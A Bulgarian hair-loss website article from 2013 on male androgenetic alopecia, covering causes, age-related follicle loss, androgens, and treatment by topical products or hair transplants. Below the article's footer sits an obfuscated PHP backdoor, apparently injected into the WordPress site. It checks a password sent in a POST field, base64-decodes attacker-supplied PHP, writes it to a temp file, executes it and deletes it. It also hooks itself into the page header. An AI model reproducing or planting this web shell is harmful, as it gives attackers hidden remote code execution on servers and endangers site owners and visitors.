Може ли да се спасим от мъжки косопад? | Косопад

Има ли спасение от мъжки косопад?

андрогенна алопеция

Андрогенна алопеция

Много страдащи от класическо оплешивяване мъже си задават въпроса, има ли начин да спрат косопада и главата им отново да се покрие с коса. Отговорът в никакъв случай не би могъл да бъде еднозначен, без да се направят пълни изследвания на пациента, за да се установят причините.

Лекари обясняват, че окосмението върху скалпа и тялото може да регистрира различни смущения, както всеки друг орган. Когато става въпрос за косата обаче общите закони не важат, а причината затова се крие в цикличния процес на умиране и раждане на космите. При наличие на косопад се променя растежа като цяло, и това често води до оплешивяване и психологическо сътресение на засегнатия.

Една от основните предпоставки за оплешивяване и косопад е напредването на възрастта. При децата гъстотата на космените фоликули е повече от 1 000 на квадратен сантиметър, а около 35 годишна възраст се редуцира почти наполовина. При мъжете оплешивяването е особено характерно, обичайно в горните страни на челото или на темето.

Характерният косопад при мъжете е отделен случай в проблемите с растежа на косата. Нарича се андрогенна алопеция, засяга жени и мъже. В процеса си на развитие андрогенната алопеция забавя и намалява растежа на космите в засегнатите зони, а състоянието е генетично обусловено. Основен фактор при този вид оплешивяване и косопад са мъжките полови хормони (андрогени).

Специалисти споделят, че андрогенната алопеция може да се лекува успешно чрез подходящи препарати против косопад или хирургични методи. Първият начин е напълно безболезнен и по – евтин, но не винаги дава резултат. Присаждането на коса е доста болезнено според пациенти и е доста по – скъпо. Освен това няма никаква гаранция, че след болезнените процедури няма да олисее някое ново петно.

Изключително важно е да се знае, че колкото по – рано стартира лечението на косопад, толкова по – добри резултати могат да се очакват.

косопад и оплешивяване

Типични фази на косопад и оплешивяване

24. април 2013 09:00:38 от Косопад
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}